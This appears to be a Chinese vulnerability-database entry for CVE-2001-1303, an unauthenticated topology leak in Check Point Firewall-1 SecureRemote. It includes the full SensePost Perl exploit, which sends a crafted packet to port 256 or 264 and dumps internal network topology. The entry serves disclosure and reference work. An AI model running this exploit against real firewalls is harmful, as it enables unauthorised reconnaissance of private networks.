Check Point Firewall-1 SecureRemote网络信息泄露漏洞-安全小百科

Check Point Firewall-1 SecureRemote网络信息泄露漏洞

漏洞ID	1106434	漏洞类型	配置错误
发布时间	2001-07-17	更新时间	2005-05-02
CVE编号	CVE-2001-1303	CNNVD-ID	CNNVD-200107-113
漏洞平台	Hardware	CVSS评分	5.0

|漏洞来源

https://www.exploit-db.com/exploits/21015
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200107-113

|漏洞详情

SecureRemote是CheckPoint软件设计的一个专利VPN构件，包含在某些版本的Firewall-1中。这个软件包存在一个安全问题，允许远程攻击者收集内部网络的信息。在某些旧版本中，它甚至会在通过身份验证之前就将内部网络的拓扑信息发送给连接者，这可能给攻击者进一步了解目标网络的机会。

|漏洞EXP

source: http://www.securityfocus.com/bid/3058/info

SecureRemote is the proprietary VPN infrastructure designed by Check Point Software, and included with some versions of Firewall-1.

A problem with the package allows remote users to gain information about internal networks. Older versions of the package send network topology information to SecureRemote connections prior to authentication, allowing an information gathering attack. 

#!/usr/bin/perl
# A Command-line tool that can be used to download network Topology
# from Firewall-1's running SecureRemote, with the option "Allow un
# authenticated cleartext topology downloads".
# Usage sr.pl IP
# Haroon Meer & Roelof Temmingh 2001/07/17
# [email protected] - http://www.sensepost.com

use Socket;
if ($#ARGV<0) {die "Usage: sr.pl IPn";}

$port=256;
$target=inet_aton($ARGV[0]);
print "Testing $host on port $portn";

$SENDY="410000000259052100000004c41e43520000004e28746f706f6c6f67792d726571756573740a093a63616e616d6520282d53656e7365506f73742d646f74
636f6d2d290a093a6368616c6c656e67652028633265323331383339643066290a290a00";
$SENDY = pack("H*",$SENDY);

@results=sendraw($SENDY);

if ($#results == 0) {
 print "No results on port 256 - trying 264n";
 $port=264;
 @results2=sendraw($SENDY); 
 if ($#results2 == 0) {die "Sorry - no resultsn";}
} else {print @results;}

sub sendraw {
 my ($pstr)=@_;
 socket(S,PF_INET,SOCK_STREAM,getprotobyname('tcp')||0) || die("Socket problemsn");
 if(connect(S,pack "SnA4x8",2,$port,$target)){
  my @in;
  select(S);      $|=1;   print $pstr;
  while(<S>){ push @in, $_;}
  select(STDOUT); close(S); return @in;
 } else { return ""; }
}
# Spidermark: sensepostdata fw1

|参考资料

来源:XF
名称:fw1-securemote-gain-information(6857)
链接:http://xforce.iss.net/static/6857.php
来源:BID
名称:3058
链接:http://www.securityfocus.com/bid/3058
来源:BUGTRAQ
名称:20010718Firewall-1Informationleak
链接:http://www.securityfocus.com/archive/1/197566
来源:OSVDB
名称:588
链接:http://www.osvdb.org/588

相关推荐: AIX lquerypv Vulnerability

AIX lquerypv Vulnerability 漏洞ID 1105119 漏洞类型 Access Validation Error 发布时间 1996-11-24 更新时间 1996-11-24 CVE编号 N/A CNNVD-ID N/A 漏洞平台 N…

文章版权归作者所有，未经允许请勿转载。

THE END